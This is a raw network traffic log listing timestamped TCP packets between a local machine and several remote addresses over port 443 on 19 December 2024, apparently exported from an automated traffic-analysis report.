                                                                                                                          Dec 19, 2024 17:09:05.758574009 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:05.793178082 CET49784443192.168.2.16151.101.130.137
                                                                                                                          Dec 19, 2024 17:09:05.793286085 CET49785443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:05.793329000 CET44349785104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:05.809418917 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:05.809480906 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:05.841336012 CET49785443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:05.857362986 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.172472000 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.218802929 CET44349785104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.218898058 CET44349785104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.218986988 CET49785443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:06.219475985 CET49785443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:06.219496965 CET44349785104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.220218897 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.220283985 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.220326900 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.220334053 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.220345974 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.220403910 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.220410109 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.220957041 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.221005917 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.221014023 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.221735001 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.221775055 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.221787930 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.221796036 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.221820116 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:06.221844912 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.221856117 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.221924067 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:06.222125053 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.222174883 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:06.222187042 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.223093033 CET49784443192.168.2.16151.101.130.137
                                                                                                                          Dec 19, 2024 17:09:06.271136045 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.338320971 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.338335991 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.338365078 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.338385105 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.338397026 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.338413954 CET49784443192.168.2.16151.101.130.137
                                                                                                                          Dec 19, 2024 17:09:06.338443041 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.338527918 CET49784443192.168.2.16151.101.130.137
                                                                                                                          Dec 19, 2024 17:09:06.339411974 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.383140087 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.389477015 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.393631935 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.393827915 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.393846035 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.402148962 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.402247906 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.402285099 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.410516977 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.410625935 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.410645962 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.411859035 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.411878109 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.411921978 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.411936998 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.411955118 CET49784443192.168.2.16151.101.130.137
                                                                                                                          Dec 19, 2024 17:09:06.411967039 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.412014961 CET49784443192.168.2.16151.101.130.137
                                                                                                                          Dec 19, 2024 17:09:06.418906927 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.418987989 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.419004917 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.435870886 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.435955048 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.435976982 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.444032907 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.444123983 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.444144964 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.444161892 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.444220066 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.452411890 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.460827112 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.460943937 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.460947037 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.460968018 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.461143017 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.462409019 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.462447882 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.462511063 CET49784443192.168.2.16151.101.130.137
                                                                                                                          Dec 19, 2024 17:09:06.462526083 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.462579012 CET49784443192.168.2.16151.101.130.137
                                                                                                                          Dec 19, 2024 17:09:06.469217062 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.510293961 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.510337114 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.563237906 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.581608057 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.583946943 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.584013939 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.584182978 CET49784443192.168.2.16151.101.130.137
                                                                                                                          Dec 19, 2024 17:09:06.584182978 CET49784443192.168.2.16151.101.130.137
                                                                                                                          Dec 19, 2024 17:09:06.584230900 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.584387064 CET49784443192.168.2.16151.101.130.137
                                                                                                                          Dec 19, 2024 17:09:06.585329056 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.585381985 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.585396051 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.585406065 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.585459948 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.592936993 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.593087912 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.593175888 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.603684902 CET49786443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.603741884 CET44349786104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.617568970 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.617630959 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.617789984 CET49784443192.168.2.16151.101.130.137
                                                                                                                          Dec 19, 2024 17:09:06.617789984 CET49784443192.168.2.16151.101.130.137
                                                                                                                          Dec 19, 2024 17:09:06.617818117 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.617928028 CET49784443192.168.2.16151.101.130.137
                                                                                                                          Dec 19, 2024 17:09:06.627528906 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.627681971 CET49784443192.168.2.16151.101.130.137
                                                                                                                          Dec 19, 2024 17:09:06.627695084 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.627732038 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.627796888 CET49784443192.168.2.16151.101.130.137
                                                                                                                          Dec 19, 2024 17:09:06.628071070 CET49784443192.168.2.16151.101.130.137
                                                                                                                          Dec 19, 2024 17:09:06.628087997 CET44349784151.101.130.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.628154993 CET49784443192.168.2.16151.101.130.137
                                                                                                                          Dec 19, 2024 17:09:06.628175020 CET49784443192.168.2.16151.101.130.137
                                                                                                                          Dec 19, 2024 17:09:06.765063047 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.765103102 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.765183926 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.769229889 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:06.769246101 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.780411959 CET49789443192.168.2.16151.101.66.137
                                                                                                                          Dec 19, 2024 17:09:06.780459881 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:06.780555964 CET49789443192.168.2.16151.101.66.137
                                                                                                                          Dec 19, 2024 17:09:06.780920029 CET49789443192.168.2.16151.101.66.137
                                                                                                                          Dec 19, 2024 17:09:06.780931950 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.433341980 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.433669090 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:07.433702946 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.434170008 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.434638977 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:07.434720993 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.434834957 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:07.475369930 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.885798931 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.885858059 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.885899067 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.885951042 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.885994911 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.885991096 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:07.886061907 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.886107922 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:07.886132956 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:07.894160986 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.902453899 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.902559996 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:07.902580976 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.911720037 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.911813021 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:07.911829948 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.965152025 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:07.987984896 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.988364935 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:07.988389969 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.989445925 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.989675045 CET49789443192.168.2.16151.101.66.137
                                                                                                                          Dec 19, 2024 17:09:07.989692926 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.990288973 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.990432978 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:07.990750074 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:07.990833998 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.990928888 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:07.990937948 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.991132975 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.991208076 CET49789443192.168.2.16151.101.66.137
                                                                                                                          Dec 19, 2024 17:09:07.991523981 CET49789443192.168.2.16151.101.66.137
                                                                                                                          Dec 19, 2024 17:09:07.991594076 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:07.991628885 CET49789443192.168.2.16151.101.66.137
                                                                                                                          Dec 19, 2024 17:09:08.005909920 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.035363913 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.045142889 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:08.045147896 CET49789443192.168.2.16151.101.66.137
                                                                                                                          Dec 19, 2024 17:09:08.045171022 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.061130047 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:08.061189890 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.081398964 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.081460953 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.081499100 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:08.081513882 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.081567049 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:08.089409113 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.093192101 CET49789443192.168.2.16151.101.66.137
                                                                                                                          Dec 19, 2024 17:09:08.094604015 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.094716072 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:08.094733953 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.107872963 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.107969046 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:08.107980967 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.115748882 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.115839005 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:08.115847111 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.123636961 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.123723984 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:08.123735905 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.131745100 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.131824970 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:08.131836891 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.139858007 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.139945030 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:08.139955997 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.147380114 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.147469044 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:08.147476912 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.154375076 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.154470921 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:08.154479980 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.161642075 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.161736012 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:08.161744118 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.169440985 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.169545889 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:08.169563055 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.169629097 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.169698000 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:08.169944048 CET49787443192.168.2.16104.18.94.41
                                                                                                                          Dec 19, 2024 17:09:08.169971943 CET44349787104.18.94.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.314030886 CET49790443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:08.314062119 CET44349790104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.314163923 CET49790443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:08.314405918 CET49790443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:08.314419985 CET44349790104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.343578100 CET49791443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:08.343636036 CET44349791104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.343741894 CET49791443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:08.344084978 CET49791443192.168.2.16104.18.95.41
                                                                                                                          Dec 19, 2024 17:09:08.344118118 CET44349791104.18.95.41192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.424576998 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.434850931 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.435028076 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.435112953 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.435151100 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:08.435205936 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.435269117 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:08.435286999 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.443775892 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.443875074 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:08.443891048 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.452259064 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.452406883 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:08.452419996 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.481304884 CET49789443192.168.2.16151.101.66.137
                                                                                                                          Dec 19, 2024 17:09:08.505132914 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:08.505142927 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.553193092 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:08.554681063 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.601162910 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:08.601171017 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.616096973 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.616108894 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.616137028 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.616147995 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.616162062 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.616202116 CET49789443192.168.2.16151.101.66.137
                                                                                                                          Dec 19, 2024 17:09:08.616214991 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.616276979 CET49789443192.168.2.16151.101.66.137
                                                                                                                          Dec 19, 2024 17:09:08.627823114 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.627923012 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:08.627931118 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.635682106 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.635776043 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:08.635788918 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.643369913 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.643450975 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.643600941 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:08.643608093 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.643666029 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:08.651252985 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.659288883 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.659383059 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:08.659396887 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.659661055 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.659671068 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.659694910 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.659703970 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.659739971 CET49789443192.168.2.16151.101.66.137
                                                                                                                          Dec 19, 2024 17:09:08.659751892 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.659801960 CET49789443192.168.2.16151.101.66.137
                                                                                                                          Dec 19, 2024 17:09:08.659825087 CET49789443192.168.2.16151.101.66.137
                                                                                                                          Dec 19, 2024 17:09:08.666910887 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.666982889 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:08.666990042 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.674768925 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.674841881 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:08.674849033 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.682534933 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.682620049 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:08.682626009 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.697339058 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.697559118 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:08.697566032 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.704850912 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.704880953 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.704937935 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:08.704945087 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.704997063 CET49788443192.168.2.16104.17.25.14
                                                                                                                          Dec 19, 2024 17:09:08.710530996 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.710541964 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.710562944 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.710587025 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.710613966 CET49789443192.168.2.16151.101.66.137
                                                                                                                          Dec 19, 2024 17:09:08.710628033 CET44349789151.101.66.137192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.710649014 CET49789443192.168.2.16151.101.66.137
                                                                                                                          Dec 19, 2024 17:09:08.710673094 CET49789443192.168.2.16151.101.66.137
                                                                                                                          Dec 19, 2024 17:09:08.712378025 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.719928026 CET44349788104.17.25.14192.168.2.16
                                                                                                                          Dec 19, 2024 17:09:08.720011950 CET49788443192.168.2.16104.17.25.14
